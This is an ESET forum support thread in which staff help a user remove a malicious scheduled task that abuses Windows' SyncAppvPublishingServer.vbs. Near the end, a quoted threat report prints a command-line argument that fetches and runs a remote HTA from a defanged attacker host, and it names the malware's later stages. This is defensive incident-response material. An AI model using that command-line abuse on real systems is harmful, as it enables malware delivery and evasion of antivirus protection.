Jump to content

Windows Script Host issue - SyncAppvPublishingServer.vbs


Recommended Posts

Every time I boot my PC and login to Windows 10, I am given the message shown in the attached image.

Please see thread: https://www.tenforums.com/general-support/205472-windows-script-host-issue-syncappvpublishingserver-vbs.html

Was pointed to a couple of threads here which seemed to indicate I could be dealing with a hidden trojan(?)

Really hoping somebody would be able to point me in the right direction as some of the info in the threads below went over my head, and now I'm very concerned!

https://forum.eset.com/topic/32186-two-strange-powershell-processes-maybe-coinminers/page/2/
https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/

 

whatisthis.PNG

Link to comment
Share on other sites

Appears this might be related to: https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/ .

Have you checked the Eset Dectections log for any PowerShell detection log entries related to this?

In any case, a NetService\Network scheduled task is not a legit Win scheduled task.

Also, Windows is stating it can't find C:\Windows\System32\SyncAppvPublishingServer.vbs file. If this file does exist on your Windows installation, I suspect the attacker screwed up in coding the full path correctly in the NetService\Network scheduled task actions tab causing the Windows file not found alert that is appearing.

Edited by itman
Link to comment
Share on other sites

  • Administrators

Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW), however, there was no such record in the Detections log most likely because the vbs script no longer existed on the disk and could not actually run. However, I could not find any reference to the vbs file neither in the registry nor WMI repository.

The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed).

Link to comment
Share on other sites

1 hour ago, Marcos said:

Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW), however, there was no such record in the Detections log most likely because the vbs script no longer existed on the disk and could not actually run.

I believe my original theory is correct and the command line text wscript.exe executed wasn't coded properly. Assumed is Eset is only going to process the command line text after it was parsed by wscript.exe. Something along this example;

Quote

I'm trying to write a script that manipulates its command line and then runs
the command line. E.g.:

myscript.vbs "C:\Full Path\Program.exe" /option"Some option" "C:\Some file"
/etc

which would then execute:

"C:\Full Path\Program.exe" /option"Some other option" "C:\Some other file"
/etc

The problem is that VBScript doesn't allow access to the full command line
like most other languages. Furthermore, the individual parameters get the
quotes stripped, so WScript.Arguments returns:

C:\Full Path\Program.exe
/optionSome other option
C:\Some file
/etc

https://groups.google.com/g/microsoft.public.scripting.vbscript/c/TyCgZkAUS5o

Edited by itman
Link to comment
Share on other sites

5 hours ago, itman said:

Have you checked the Eset Dectections log for any PowerShell detection log entries related to this?

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
21/04/2023 3:25:41 PM;HTTP filter;file;https://www.tumbex.com/pgpxgopaqym.php;JS/Adware.Plugrush.B application;connection terminated;DESKTOP-8K3015I\Jack;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (F0C67FC4D1EB285A3C76A23DC38BF228BD60EC66).;A566A6BB374BF7D46BD3FF941067F26F4FAC1390;

 

5 hours ago, Marcos said:

The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed).

I get the same message every time I boot Windows. Bootlog attached! It's a .rar for compression reasons

Bootlog.rar

Link to comment
Share on other sites

  • Administrators

Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error.

Link to comment
Share on other sites

Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation?

If it does not exist, open an admin level command prompt window. Then enter the following;

sfc /scannow

This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists.

Link to comment
Share on other sites

3 hours ago, itman said:

Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation?

If it does not exist, open an admin level command prompt window. Then enter the following;

sfc /scannow

This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists.

Do I want the file to (currently) exist if something is trying to use it for something other than it's intended purpose?

 

11 hours ago, Marcos said:

Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error.

I stopped logging after the error popped up, although I didn't clear the error. I'll do it again

Link to comment
Share on other sites

55 minutes ago, microbill said:

Do I want the file to (currently) exist if something is trying to use it for something other than it's intended purpose?

I want you to verify that SyncAppvPublishingServer.vbs exists in C:\Windows\System32\ directory and post back your finding.

Eset_Sync.thumb.png.87d01bd5effd27be2b6cba2d067cb2aa.png

Edited by itman
Link to comment
Share on other sites

  • Administrators
1 hour ago, microbill said:

See attached bootlog. I cleared the error this time before opening Process Monitor and saving the log.

This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine.

Link to comment
Share on other sites

3 hours ago, itman said:

I want you to verify that SyncAppvPublishingServer.vbs exists in C:\Windows\System32\ directory and post back your finding.

No, it does not.

 

1 hour ago, Marcos said:

This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine.

The message no longer shows up!

 

Edited by microbill
Link to comment
Share on other sites

1 hour ago, microbill said:

No, it does not.

I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file.

Link to comment
Share on other sites

1 hour ago, itman said:

I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file.

The file does not show in the folder

Capture.PNG

 

Of note, my custom Windows 10 theme has now reverted from the green/yellow/red buttons in above screenshot, to the standard Windows 10 buttons.

Edited by microbill
Link to comment
Share on other sites

  • Administrators

Strange, on my Win10 machine SyncAppvPublishingServer.vbs was restored after running sfc /scannow. Nevertheless, since it's not a file that you need and it's misused by malware, I'd suggest not to restore it unless you need it.

Link to comment
Share on other sites

  • Administrators
4 hours ago, microbill said:

Thank you. Should I run any other tests now aside from a normal Eset scan?

You can run a 2nd opinion scan with another AV (online scanner) but it's not necessary.

Link to comment
Share on other sites

11 hours ago, microbill said:

The file does not show in the folder

Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan.

Edited by itman
Link to comment
Share on other sites

Another recent attack abusing SyncAppvPublishingServer.vbs is;

Quote

XWorm Delivered Through Tax Scam

FortiGuard Labs became aware of a curious-looking archive file hosted on an open directory on www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed.

The zip file contains the following files:

  • Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0)
  • Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a)

The XLSX file is a benign decoy file that contains financial data from an unknown source.

The other file is malicious. Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems. The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments. The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote “note.hta”:

;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.'+'hta')

The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation. Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload.

note.gif is a PowerShell script that creates the following files:

  • C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C)
  • C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327)
  • C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC)

Once launched, it executes the onedrive.vbs and test.vbs files.

Test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data.

Onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender.

The malware then proceeds to perform an AMSI bypass and totally trash Windows Defender protection mechanisms.

Full detailed analysis here: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large

I do think its about time Eset start warning about command line input on SyncAppvPublishingServer.vbs execution.

Edited by itman
Link to comment
Share on other sites

On 6/17/2023 at 6:03 AM, itman said:

Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan.

I did, and have rebooted a handful of times this weekend and there is still no file. Should I be concerned? I worry that whatever this malware code was may be embedded somewhere else waiting to strike.

On 6/17/2023 at 7:56 AM, itman said:

Here's the malware attack details: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/ . You stop crud like this by setting PowerShell to Constrained Language mode which prevents deployment of PowerShell subassemblies via .Net.

Thank you for this. To confirm, I should execute this code within Powershell?

I was going to ask if should create a new User account on this W10 install and then deactivate the Administrator account but upon looking, the account I use is not the "Administrator" account.

 

users.PNG

Link to comment
Share on other sites

1 hour ago, microbill said:

To confirm, I should execute this code within Powershell?

No! It's just an illustration of one method SyncAppvPublishingServer.vbs can be abused.

As far as SyncAppvPublishingServer.vbs missing from your Windows installation, I agree w/@Marcos that you should not be concerned about it. As best as I can determine, the only process that legitimately uses it is Office 2010 Access.

Edited by itman
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...